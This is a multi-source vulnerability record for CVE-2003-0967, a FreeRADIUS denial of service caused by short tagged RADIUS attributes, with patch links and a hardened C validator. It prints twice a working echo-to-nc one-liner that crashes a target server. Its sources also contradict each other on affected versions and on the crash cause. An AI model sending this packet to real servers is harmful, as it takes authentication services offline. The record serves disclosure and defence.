CVE-2003-0967
CVSS 5.0
Published: 2003-12-15 00:00:00
Revised: 2016-10-17 22:38:35

[Original] rad_decode in FreeRADIUS 0.9.2 and earlier allows remote attackers to cause a denial of service (crash) via a short RADIUS string attribute with a tag, which causes memcpy to be called with a -1 length argument, as demonstrated using the Tunnel-Password attribute.


[CNNVD] FreeRADIUS Tag Header Field Heap Corruption Vulnerability (CNNVD-200312-028)

        
        FreeRADIUS is an open-source authentication and accounting system that uses the RADIUS protocol.
        FreeRADIUS does not correctly handle the tag field of incoming data; a remote attacker can exploit this flaw to mount a denial-of-service attack against the service.
        The problem occurs when FreeRADIUS processes the "Tunnel-Password" attribute in an Access-Request packet. This attribute carries a 'tag' (RFC 2868) followed by a 'string' value, and an attribute only 2-3 bytes long causes the server to call 'memcpy' with a length of '-1'.
        The packet contents of the 256-byte RADIUS attribute are then copied into the current heap structure, and the remaining data overwrites the heap contents that follow. Since a RADIUS packet is at most 4K long, after overwriting the structure header the attacker still has about 3.5K of data with which to attack.
        The source IP address of the packet must be in the server's configured client list, but because RADIUS does not require packet signatures, any machine on the network can send a spoofed UDP packet and crash the RADIUS service.
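As an added example (not code from this record, from FreeRADIUS, or from the advisory authors), the length arithmetic described above is shown beside a hardened attribute walker in C that rejects a tagged string attribute before any copy happens. The set of tagged string types and the Length >= 4 minimum are this example's own assumptions; the sample packet is constructed from the 22 bytes of the nc command quoted in this record.

```c
#include <stddef.h>
#include <stdint.h>

#define RADIUS_HDR_LEN 20   /* Code, Identifier, Length, 16-byte Authenticator */
/* RFC 2868 tagged string attributes (Type, Length, Tag, String...); set assumed for this example. */
static int is_tagged_string(uint8_t t) {
    return t == 66 || t == 67 || t == 69 || t == 81 || t == 82 || t == 90 || t == 91;
}

/* The arithmetic the advisory describes: Length - 2 (header) - 1 (tag) with no lower bound,
 * so Length 2 becomes -1, which memcpy receives as SIZE_MAX. Shown for contrast, never used. */
size_t vuln_string_len(uint8_t attr_len) {
    int n = (int)attr_len - 2 - 1;
    return (size_t)n;
}

typedef struct { uint8_t type, tag; size_t str_len; const uint8_t *str; } tagged_attr_t;
/* Hardened decoder: 0 on success, -1 if malformed. Requires Type, Length, Tag plus at least
 * one string byte (Length >= 4) and never reads past the bytes actually available. */
int decode_tagged_attr(const uint8_t *p, size_t avail, tagged_attr_t *out) {
    if (avail < 2) return -1;
    uint8_t len = p[1];
    if (len < 4 || len > avail) return -1;   /* rejects the Length 2 and 3 cases from the advisory */
    out->type = p[0]; out->tag = p[2]; out->str_len = (size_t)len - 3; out->str = p + 3;
    return 0;
}

/* Walk every attribute of a RADIUS packet before anything is copied. Returns the attribute
 * count, or -1 on the first malformed attribute so the whole packet can be dropped. */
int check_packet(const uint8_t *pkt, size_t pkt_len) {
    if (pkt_len < RADIUS_HDR_LEN) return -1;
    size_t declared = ((size_t)pkt[2] << 8) | pkt[3];
    if (declared < RADIUS_HDR_LEN || declared > pkt_len) return -1;
    int count = 0;
    for (size_t off = RADIUS_HDR_LEN; off < declared; count++) {
        if (declared - off < 2) return -1;
        uint8_t type = pkt[off], len = pkt[off + 1];
        if (is_tagged_string(type)) {
            tagged_attr_t a;
            if (decode_tagged_attr(pkt + off, declared - off, &a) != 0) return -1;
        } else if (len < 2 || len > declared - off) {
            return -1;   /* plain attribute: Length counts Type+Length, so 2 is the structural floor */
        }
        off += len;
    }
    return count;
}

/* Constructed sample: Access-Request (code 1, id 1, length 0x0016, zero Authenticator) carrying Tunnel-Password 0x45 with Length 2 */
const uint8_t bad_pkt[22] = {0x01,0x01,0x00,0x16, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0x45,0x02};
```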
        

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:10917
rad_decode in FreeRADIUS 0.9.2 and earlier allows remote attackers to cause a denial of service (crash) via a short RADIUS string attribute ...
*OVAL describes in detail how to detect this vulnerability; more technical details on detecting it can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0967
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0967
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-028
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=106935911101493&w=2
(UNKNOWN)  BUGTRAQ  20031120 Remote DoS in FreeRADIUS, all versions.
http://marc.info/?l=bugtraq&m=106944220426970
(UNKNOWN)  BUGTRAQ  20031121 FreeRADIUS 0.9.2 "Tunnel-Password" attribute Handling Vulnerability
http://marc.info/?l=freeradius-users&m=106947389449613&w=2
(UNKNOWN)  CONFIRM  http://marc.info/?l=freeradius-users&m=106947389449613&w=2
http://www.redhat.com/support/errata/RHSA-2003-386.html
(UNKNOWN)  REDHAT  RHSA-2003:386

- Vulnerability information

FreeRADIUS Tag Header Field Heap Corruption Vulnerability
Medium severity  Input validation
2003-12-15 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patch:
        FreeRADIUS
        ----------
        The vendor has released an upgrade that fixes this security issue; please download it from the vendor's site:
        FreeRADIUS Upgrade freeradius-0.9.3.tar.gz
        ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz

- Vulnerability information (23391)

FreeRADIUS 0.x/1.1.x Tag Field Heap Corruption Vulnerability (EDBID:23391)
linux dos
2003-11-20 Verified
0 Evgeny Legerov
N/A
source: http://www.securityfocus.com/bid/9079/info

FreeRADIUS is prone to a heap-corruption vulnerability when handling tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.

This issue was initially reported as a vulnerability in how the software handles the 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.

This vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.

UPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.

bash-2.05$ echo -ne "\x01\x01\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x45\x02" | nc -vu -w1 <victim> <port>

		

- Vulnerability information

2850
FreeRADIUS Tagged Attribute Handling DoS
Denial of Service
Loss of Availability

- Vulnerability description

FreeRADIUS 0.9.2, and earlier, contains a flaw that may allow a remote denial of service. The issue is triggered when the service receives a malformed packet, and results in loss of availability for the service. It is possible to crash the service due to a NULL pointer dereference bug, which can be exploited by sending an "Access-Request" packet containing a "Tunnel-Password" attribute.

- Timeline

2003-11-20 2003-11-20
2003-11-21 Unknown

- Solution

Upgrade to version 0.9.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

FreeRADIUS Tag Field Heap Corruption Vulnerability
Input Validation Error 9079
Yes No
2003-11-20 12:00:00 2009-09-10 08:41:00
Discovery credited to Evgeny Legerov.

- Affected program versions

RedHat Enterprise Linux WS 5
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux 5 server
Red Hat Enterprise Linux Desktop 5 client
Red Hat Enterprise Linux AS 3
FreeRADIUS FreeRADIUS 1.1.7
FreeRADIUS FreeRADIUS 1.1.6
FreeRADIUS FreeRADIUS 1.1.5
FreeRADIUS FreeRADIUS 1.1.4
FreeRADIUS FreeRADIUS 1.1.3
FreeRADIUS FreeRADIUS 0.9.2
FreeRADIUS FreeRADIUS 0.9.1
FreeRADIUS FreeRADIUS 0.9
FreeRADIUS FreeRADIUS 0.8.1
FreeRADIUS FreeRADIUS 0.8
FreeRADIUS FreeRADIUS 0.5
FreeRADIUS FreeRADIUS 0.4
FreeRADIUS FreeRADIUS 0.3
FreeRADIUS FreeRADIUS 0.3
FreeRADIUS FreeRADIUS 0.2
FreeRADIUS FreeRADIUS 1.1.8
FreeRADIUS FreeRADIUS 0.9.3

- Unaffected program versions

FreeRADIUS FreeRADIUS 1.1.8
FreeRADIUS FreeRADIUS 0.9.3

- Exploit

Attackers may exploit this issue using readily available commands.

The following example command is available:

bash-2.05$ echo -ne "\x01\x01\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x45\x02" | nc -vu -w1 <victim> <port>

- Solution

The vendor has released updates. Please see the references for details.



- References

 

 
